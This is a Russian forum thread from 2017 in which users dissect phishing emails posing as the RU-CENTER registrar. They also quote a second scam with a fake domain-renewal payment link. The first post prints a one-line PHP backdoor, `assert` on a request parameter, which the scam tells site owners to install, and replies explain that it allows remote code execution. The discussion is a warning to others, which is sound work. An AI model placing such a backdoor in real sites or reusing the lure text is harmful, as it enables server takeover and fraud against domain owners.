Мошеннические письма от имени ru center

Sergey Poziturin написал(а) к All в Aug 17 08:55:16 по местному времени:

Нello, All.

Аккуратно, сабж :)

Руки чесались сделать honeypot и изучить, как у них чего устроено, но беглый гуглеж показал, что добрые люди все давно сделали за меня, а письма такие приходят и от других "организаций".

==
Уважаемый клиент!

В соответствии с изменениями, внесенными в*правила ICANN, Вы должны подтвердить, что фактическое управление доменным именем*propush.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете возможность управлять доменом, создайте в корневой директории сайта файл*a1p0q966ham6br04.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

Файл должен быть создан в течение трех*рабочих дней с момента получения*данного уведомления и находиться на сервере до 16 августа 2017 года,*19:00 (UTC+03:00), в противном случае процедура подтверждения будет считаться непройденной.

Уведомляем Вас о том, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
==

--
Best regards!
Posted using Нotdoged on Android
--- Нotdoged/2.13.5/Android

Evgeny Mikheev написал(а) к Sergey Poziturin в Aug 17 12:24:18 по местному времени:

Привет, Sergey!

06 авг 17 08:55, Sergey Poziturin -> All:

SP> <?php
SP> assert(stripslashes($_REQUEST[RUCENTER]));
SP> ?>

В php не силен, что злоумышленнику позволяет выполнить этот код?

С наилучшими пожеланиями, Evgeny.

--- -Пиши, старик, пиши! Мы тебя не покинем.

Alex Kovrigin написал(а) к Sergey Poziturin в Aug 17 16:14:34 по местному времени:

Нello Sergey,
In a message dated 06 Aug 17 you wrote to All:

SP> Аккуратно, сабж :)

Ага, я пеpвым делом заглянул в Received, там такая туфта:

Received: from data01ua.trust-host.ru ([62.149.15.150]:44682)
by mx206.i.mail.ru with esmtp (envelope-from <sayma100@data01ua.trust-host.ru>)
id 1d41IE-00023O-3s
for creator-nsk@mail.ru; Fri, 28 Apr 2017 11:30:22 +0300
Received: from sayma100 by data01ua.trust-host.ru with local (Exim 4.88)
(envelope-from <sayma100@data01ua.trust-host.ru>)
id 1d41IA-003kkk-OG
for creator-nsk@mail.ru; Fri, 28 Apr 2017 11:30:18 +0300

Такие смешные.

WBR, Alex Kovrigin <alex(at)kovrigin.ru>

--- Mail Manager 1.22x/n #1509

Eugene Muzychenko написал(а) к Alex Kovrigin в Aug 17 17:45:36 по местному времени:

Привет!

06 Aug 17 16:14, you wrote to Sergey Poziturin:

AK> Такие смешные.

Смешные - не смешные, а свои 10-20% недоадминов (которые по инструкциям из сети сумели поднять сервер, отчего вообразили себя админами) поимеют. :)

Всего доброго!
Евгений Музыченко
eu-gene@muzy-chen-ko.net (все дефисы убрать)

--- GoldED+/W32-MSVC 1.1.5-b20170303

Sergey Poziturin написал(а) к Evgeny Mikheev в Aug 17 08:41:10 по местному времени:

Нello, Evgeny Mikheev.
On 06.08.17 12:24 ПП you wrote:

SP>> <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>
EM> В php не силен, что злоумышленнику позволяет выполнить этот код?

http://php.net/manual/ru/function.assert.php

Фактически это выполнение на сервере кода, переданного в запросе. Гораздо интереснее, какой конкретно код они попытаются выполнить.

--
Best regards!
Posted using Нotdoged on Android
--- Нotdoged/2.13.5/Android

Egor Glukhov написал(а) к Sergey Poziturin в Aug 17 09:43:34 по местному времени:

Sergey,

07 Aug 17 08:41, you wrote to Evgeny Mikheev:

SP>>> <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>
EM>> В php не силен, что злоумышленнику позволяет выполнить этот код?

SP> http://php.net/manual/ru/function.assert.php

SP> Фактически это выполнение на сервере кода, переданного в запросе. Гораздо
SP> интереснее, какой конкретно код они попытаются выполнить.

Как правило, создающий рядом файл с php-шеллом.

Егор Глухов
--- GoldED+/LNX 1.1.5-b20170303

Alexandr Shliakhov написал(а) к Evgeny Mikheev в Aug 17 10:11:10 по местному времени:

Привет, Evgeny!

Ответ на сообщение Evgeny Mikheev (2:5030/1474) к Sergey Poziturin, написанное 06 авг 17 в 12:24:

SP>> <?php
SP>> assert(stripslashes($_REQUEST[RUCENTER]));
SP>> ?>

EM> В php не силен, что злоумышленнику позволяет выполнить этот код?

Тоже в php не силён, но замечу, что злоумышленники не написали, что надо файлу дать право на исполнение.

Best regards, Alexandr
<alex1216@list.ru> <shining@everfree.equ> <2:5023/24.2868@fidonet>
... shining@shining:~$ sudo mkfs.soulfs /dev/nvram
--- GoldED+/W32-MINGW 1.1.5-b20120519

Alexey Vissarionov написал(а) к Alexandr Shliakhov в Aug 17 10:44:44 по местному времени:

Доброго времени суток, Alexandr!
07 Aug 2017 10:11:10, ты -> Evgeny Mikheev:

SP>>> <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>
EM>> В php не силен, что злоумышленнику позволяет выполнить этот код?
AS> Тоже в php не силён, но замечу, что злоумышленники не написали,
AS> что надо файлу дать право на исполнение.

Дык оно ж рассчитано на ламеров, которые его себе таки положат - а у них говносайтики в 99.99% случаев используют либо апачевский mod_php, либо, в особенно пафосных случаях, php-fpm :-)

А кто поумнее - те и вышеупомянутыми интерпретаторами не пользуются, и файлы создавать не будут.

2 all: надеюсь, все знают, как затыкать подобные бэкдоры средствами nginx?


--
Alexey V. Vissarionov aka Gremlin from Kremlin
gremlin ПРИ gremlin ТЧК ru; +vii-cmiii-ccxxix-lxxix-xlii

... Опыты над мышами подтверждают, что встреча с черной кошкой - плохая примета
--- /bin/vi

Anatoliy Sablin написал(а) к Alexey Vissarionov в Aug 17 12:56:12 по местному времени:

Нello,

Нello, Alexey Vissarionov.
On 07.08.17 10:44 you wrote:

AV> 2 all: надеюсь, все знают, как затыкать подобные бэкдоры
AV> средствами nginx?

Отключить php? ;)

--
Best regards!
Posted using Нotdoged on Android
--- Нotdoged/2.13.5/Android

Alex Kovrigin написал(а) к Eugene Muzychenko в Aug 17 13:36:19 по местному времени:

Нello Eugene,
In a message dated 06 Aug 17 you wrote to me:

EM> Смешные - не смешные, а свои 10-20% недоадминов (которые по инструкциям
EM> из сети сумели поднять сервер, отчего вообразили себя админами)
EM> поимеют. :)

Это да. А вчеpа вечеpом мне пpислали вот такое:
===
Уважаемый администратор домена!

Уведомляем Вас о том, что период регистрации домена kovrigin.ru подошел к концу.

Вам необходимо оплатить услугу продления домена в течение суток с момента получения настоящего сообщения.
===
И кнопочка "Оплатить":
http://dfib.ru/wp-includes/SimplePie...аблабла
===
Доводим до Вашего сведения, что если платеж не будет произведен в указанный срок, обслуживание доменного имени прекратится. Домен будет удален из реестра доменных имен и станет доступен для регистрации иным лицам.
===

Такие заботливые! :)

WBR, Alex Kovrigin <alex(at)kovrigin.ru>

--- Mail Manager 1.22x/n #1509